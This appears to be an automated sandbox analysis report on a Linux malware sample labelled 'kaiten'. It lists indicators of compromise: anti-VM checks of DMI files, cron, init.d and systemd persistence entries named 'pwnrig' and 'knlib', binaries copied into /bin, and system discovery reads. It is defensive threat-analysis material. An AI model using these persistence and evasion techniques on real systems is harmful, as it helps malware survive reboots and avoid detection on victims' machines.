kaiten | f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712

Processes:

grepgrepservice-agentgrepgrepservice-agentgrepservice-agentgrepgrepgrepservice-agentservice-agentservice-agentgrepgrepgrepservice-agentgrepgrepgrepgrepgrepservice-agentservice-agentgrepservice-agentgrepservice-agentgrepgrepgrepgrepgrepgrepservice-agent

description	ioc	process
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo
File opened for reading	/proc/cpuinfo
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo
File opened for reading	/proc/cpuinfo
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo
File opened for reading	/proc/cpuinfo
File opened for reading	/proc/cpuinfo
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo
File opened for reading	/proc/cpuinfo
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	service-agent
File opened for reading	/proc/cpuinfo

Checks hardware identifiers (DMI) 1 TTPs 64 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

Processes:

service-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agent

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name
File opened for reading	/sys/devices/virtual/dmi/id/product_name
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor
File opened for reading	/sys/devices/virtual/dmi/id/product_name
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	service-agent

Creates/modifies Cron job 1 TTPs 64 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

Processes:

sedteeteeteeteesedcrontabsedcrontabbin.elfsedteecrontabcrontabsedcrontabcrontabteesed

description	ioc
File opened for modification	/var/spool/cron/.lib-knlib4
File opened for modification	/etc/cron.d/sedfKxW5F	sed
File opened for modification	/etc/cron.daily/pwnrig
File opened for modification	/etc/cron.daily/sedaxSaY1
File opened for modification	/etc/cron.d/pwnrig	tee
File opened for modification	/etc/cron.monthly/sedojgyuv
File opened for modification	/etc/cron.hourly/pwnrig
File opened for modification	/etc/cron.weekly/pwnrig	tee
File opened for modification	/etc/cron.weekly/pwnrig	tee
File opened for modification	/etc/cron.monthly/pwnrig
File opened for modification	/etc/cron.d/pwnrig
File opened for modification	/etc/cron.hourly/sedvAeCkZ
File opened for modification	/etc/cron.weekly/pwnrig	tee
File opened for modification	/etc/cron.weekly/pwnrig	tee
File opened for modification	/etc/cron.d/pwnrig	tee
File opened for modification	/etc/cron.daily/sedwtUbYo	sed
File opened for modification	/var/spool/cron/crontabs/tmp.r3nnFk	crontab
File opened for modification	/etc/cron.d/pwnrig	tee
File opened for modification	/etc/cron.daily/sedYDW9HP	sed
File opened for modification	/var/spool/cron/crontabs/tmp.VtCgeI	crontab
File opened for modification	/etc/cron.d/sed9PTmQ2
File opened for modification	/etc/cron.hourly/pwnrig	tee
File opened for modification	/etc/cron.hourly/pwnrig
File opened for modification	/etc/cron.hourly/.lib-knlib4	bin.elf
File opened for modification	/etc/cron.monthly/pwnrig	tee
File opened for modification	/etc/cron.d/sedzcud0y	sed
File opened for modification	/etc/cron.weekly/pwnrig	tee
File opened for modification	/etc/cron.daily/pwnrig
File opened for modification	/var/spool/cron/crontabs/tmp.wVeByr
File opened for modification	/var/spool/cron/crontabs/tmp.EOdnds	crontab
File opened for modification	/etc/cron.weekly/sed9aYIEn	sed
File opened for modification	/etc/cron.d/.lib-knlib4
File opened for modification	/etc/cron.hourly/.lib-knlib4
File opened for modification	/etc/cron.hourly/sedabJTaO	sed
File opened for modification	/etc/cron.monthly/pwnrig	tee
File opened for modification	/etc/cron.weekly/sedLKMvv0
File opened for modification	/var/spool/cron/crontabs/tmp.4Khlmr	crontab
File opened for modification	/etc/cron.weekly/sedIGfa7H	sed
File opened for modification	/etc/cron.monthly/sedn9Qoja	sed
File opened for modification	/etc/cron.monthly/sedzsZvuH	sed
File opened for modification	/etc/cron.weekly/sedWsqyfK
File opened for modification	/etc/cron.d/sedlT93qm	sed
File opened for modification	/etc/cron.daily/pwnrig	tee
File opened for modification	/etc/cron.weekly/sedpAdRQb	sed
File opened for modification	/var/spool/cron/crontabs/tmp.99Cfil	crontab
File opened for modification	/etc/cron.d/sedO63JVH
File opened for modification	/etc/cron.hourly/sedPfSlVp	sed
File opened for modification	/etc/cron.monthly/sedpOXxxx	sed
File opened for modification	/etc/cron.monthly/pwnrig	tee
File opened for modification	/etc/cron.daily/pwnrig	tee
File opened for modification	/var/spool/cron/.lib-knlib4	bin.elf
File opened for modification	/etc/cron.daily/.lib-knlib4	bin.elf
File opened for modification	/etc/cron.d/pwnrig	tee
File opened for modification	/etc/cron.daily/pwnrig	tee
File opened for modification	/etc/cron.weekly/sedsLpDvx
File opened for modification	/etc/cron.monthly/sed0E1qqK
File opened for modification	/var/spool/cron/crontabs/tmp.ep523C	crontab
File opened for modification	/etc/cron.monthly/pwnrig	tee
File opened for modification	/etc/cron.hourly/seddM6Ya2	sed
File opened for modification	/etc/cron.hourly/pwnrig	tee
File opened for modification	/etc/cron.hourly/sedqMpv1w	sed
File opened for modification	/etc/cron.d/pwnrig
File opened for modification	/etc/cron.hourly/pwnrig	tee
File opened for modification	/etc/cron.monthly/.lib-knlib4

Enumerates running processes
Discovers information about currently running processes on the system

Modifies init.d 1 TTPs 18 IoCs

Adds/modifies system service, likely for persistence.

persistence

Boot or Logon Autostart Execution

Processes:

bin.elfsedteeteesedteeteeteesedsedsedtee

description	ioc	process
File opened for modification	/etc/init.d/pwnrig
File opened for modification	/etc/init.d/knlib	bin.elf
File opened for modification	/etc/init.d/sedViq9rA	sed
File opened for modification	/etc/init.d/pwnrig	tee
File opened for modification	/etc/init.d/pwnrig	tee
File opened for modification	/etc/init.d/sedyKynh0	sed
File opened for modification	/etc/init.d/pwnrig
File opened for modification	/etc/init.d/sedG4a8ZO
File opened for modification	/etc/init.d/pwnrig
File opened for modification	/etc/init.d/pwnrig	tee
File opened for modification	/etc/init.d/pwnrig	tee
File opened for modification	/etc/init.d/pwnrig	tee
File opened for modification	/etc/init.d/sed28QMEt	sed
File opened for modification	/etc/init.d/seddq6Yaz
File opened for modification	/etc/init.d/sed83ReyN	sed
File opened for modification	/etc/init.d/sedngRVNe	sed
File opened for modification	/etc/init.d/pwnrig	tee
File opened for modification	/etc/init.d/sedxMeVRo

Modifies systemd 1 TTPs 15 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

persistence

Boot or Logon Autostart Execution

Processes:

teeteeteeteeteebin.elf

description	ioc	process
File opened for modification	/etc/systemd/system/pwnrige.service	tee
File opened for modification	/lib/systemd/system/pwnrigl.service
File opened for modification	/etc/systemd/system/pwnrige.service
File opened for modification	/lib/systemd/system/pwnrigl.service	tee
File opened for modification	/etc/systemd/system/pwnrige.service	tee
File opened for modification	/lib/systemd/system/pwnrigl.service	tee
File opened for modification	/etc/systemd/system/pwnrige.service	tee
File opened for modification	/etc/systemd/system/pwnrige.service
File opened for modification	/etc/systemd/system/pwnrige.service	tee
File opened for modification	/lib/systemd/system/pwnrigl.service	tee
File opened for modification	/etc/systemd/system/pwnrige.service	tee
File opened for modification	/lib/systemd/system/pwnrigl.service
File opened for modification	/etc/systemd/system/knlibe.service	bin.elf
File opened for modification	/lib/systemd/system/pwnrigl.service	tee
File opened for modification	/lib/systemd/system/pwnrigl.service	tee

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

Processes:

service-agentservice-agentpkillpspspsservice-agentpspspsservice-agentservice-agentpgrepservice-agentpkillpspspspkillpspspkillpspspkillpspspkillservice-agentservice-agentpspspkillpkillpkillpkillpsservice-agentps

description	ioc	process
File opened for reading	/sys/devices/system/cpu/possible	service-agent
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/possible	service-agent
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/types
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/types	service-agent
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/possible	service-agent
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	service-agent
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/types	service-agent
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	service-agent
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/possible	service-agent
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/possible
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/types	service-agent
File opened for reading	/sys/devices/system/cpu/online	service-agent
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/types
File opened for reading	/sys/devices/system/cpu/possible	service-agent
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/types	service-agent
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/possible
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	service-agent
File opened for reading	/sys/devices/system/cpu/types	service-agent
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	service-agent
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/possible
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/possible	service-agent
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/types	service-agent
File opened for reading	/sys/devices/system/cpu/online	ps

Reads hardware information 1 TTPs 64 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

Processes:

service-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agent

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_version
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_version
File opened for reading	/sys/devices/virtual/dmi/id/product_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_name
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version
File opened for reading	/sys/devices/virtual/dmi/id/product_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_name	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_serial
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_serial
File opened for reading	/sys/devices/virtual/dmi/id/bios_date
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag
File opened for reading	/sys/devices/virtual/dmi/id/board_version	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	service-agent
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	service-agent

Writes file to system bin folder 1 TTPs 35 IoCs

Hijack Execution Flow

Processes:

cpcpcpcpcpcpcpcpcpcpcpcpbin.elfcpcpcpcpcpcpcpcpcpcpcpcp

description	ioc	process
File opened for modification	/bin/crondr	cp
File opened for modification	/bin/initdr	cp
File opened for modification	/bin/sysdr	cp
File opened for modification	/bin/initdr	cp
File opened for modification	/bin/sysdr
File opened for modification	/bin/bprofr	cp
File opened for modification	/bin/crondr	cp
File opened for modification	/bin/crondr	cp
File opened for modification	/bin/bprofr	cp
File opened for modification	/bin/crondr
File opened for modification	/bin/initdr
File opened for modification	/bin/initdr
File opened for modification	/bin/sysdr	cp
File opened for modification	/bin/initdr	cp
File opened for modification	/bin/initdr
File opened for modification	/bin/sysdr
File opened for modification	/bin/bprofr
File opened for modification	/bin/crondr	cp
File opened for modification	/bin/sysdr	cp
File opened for modification	/bin/crondr
File opened for modification	/bin/knlib5	bin.elf
File opened for modification	/bin/sysdr	cp
File opened for modification	/bin/initdr	cp
File opened for modification	/bin/initdr	cp
File opened for modification	/bin/bprofr
File opened for modification	/bin/bprofr	cp
File opened for modification	/bin/crondr	cp
File opened for modification	/bin/initdr	cp
File opened for modification	/bin/bprofr	cp
File opened for modification	/bin/bprofr	cp
File opened for modification	/bin/crondr	cp
File opened for modification	/bin/sysdr	cp
File opened for modification	/bin/bprofr	cp
File opened for modification	/bin/bprofr	cp
File opened for modification	/bin/crondr

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

Processes:

service-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentservice-agentsystemctlsystemctlsystemctl

description	ioc	process
File opened for reading	/sys/bus/node/devices/node0/cpumap
File opened for reading	/sys/kernel/mm/hugepages	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/level	service-agent
File opened for reading	/sys/fs/cgroup/unified/cgroup.controllers
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/type
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/type	service-agent
File opened for reading	/sys/bus/node/devices/node0/cpumap	service-agent
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_bandwidth	service-agent
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_bandwidth
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size
File opened for reading	/sys/bus/dax/devices/target_node
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_latency	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition	service-agent
File opened for reading	/sys/bus/node/devices/node0/access0/initiators	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/physical_package_id	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_id	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/type
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/base_frequency	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets	service-agent
File opened for reading	/sys/kernel/mm/hugepages
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.cpus	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/type	service-agent
File opened for reading	/sys/bus/node/devices/node0/access0/initiators	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/type	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/level	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_id
File opened for reading	/sys/bus/node/devices/node0/hugepages	service-agent
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/base_frequency	service-agent
File opened for reading	/sys/bus/dax/devices/target_node	service-agent
File opened for reading	/sys/kernel/mm/hugepages
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/level	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition	service-agent
File opened for reading	/sys/bus/cpu/devices
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/size
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map	service-agent
File opened for reading	/sys/bus/node/devices/node0/access0/initiators	service-agent
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/level
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/package_cpus
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_bandwidth	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/type	service-agent
File opened for reading	/sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages	service-agent
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/bus/dax/devices	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map	service-agent
File opened for reading	/sys/bus/cpu/devices	service-agent
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/size
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pspspgreppspspspssystemctlpkillpkillpspssystemctlservice-agentpspspspsidpspkillpspkillpkillawkpkillpkillps

description	ioc	process
File opened for reading	/proc/1407/cmdline	ps
File opened for reading	/proc/4162/stat	ps
File opened for reading	/proc/403/stat
File opened for reading	/proc/804/stat
File opened for reading	/proc/134/status
File opened for reading	/proc/1473/status	pgrep
File opened for reading	/proc/403/stat	ps
File opened for reading	/proc/1465/status	ps
File opened for reading	/proc/74/stat	ps
File opened for reading	/proc/89/stat	ps
File opened for reading	/proc/931/status
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/474/status	pkill
File opened for reading	/proc/90/status
File opened for reading	/proc/77/cmdline
File opened for reading	/proc/73/cmdline	pkill
File opened for reading	/proc/2452/stat	ps
File opened for reading	/proc/15/stat	ps
File opened for reading	/proc/631/status
File opened for reading	/proc/86/status
File opened for reading	/proc/459/status	ps
File opened for reading	/proc/270/status	ps
File opened for reading	/proc/449/stat
File opened for reading	/proc/457/status
File opened for reading	/proc/651/stat
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/1450/stat	ps
File opened for reading	/proc/meminfo	service-agent
File opened for reading	/proc/73/cmdline	ps
File opened for reading	/proc/self/auxv
File opened for reading	/proc/509/cmdline	ps
File opened for reading	/proc/1501/status	ps
File opened for reading	/proc/70/stat	ps
File opened for reading	/proc/filesystems	id
File opened for reading	/proc/102/status	ps
File opened for reading	/proc/930/stat	ps
File opened for reading	/proc/1094/status	pkill
File opened for reading	/proc/618/stat	ps
File opened for reading	/proc/12/stat
File opened for reading	/proc/3669/status	ps
File opened for reading	/proc/1083/stat	ps
File opened for reading	/proc/1465/cmdline	pkill
File opened for reading	/proc/165/cmdline
File opened for reading	/proc/312/cmdline	pkill
File opened for reading	/proc/170/cmdline	ps
File opened for reading	/proc/20/status
File opened for reading	/proc/167/stat
File opened for reading	/proc/1473/status
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/175/status	pkill
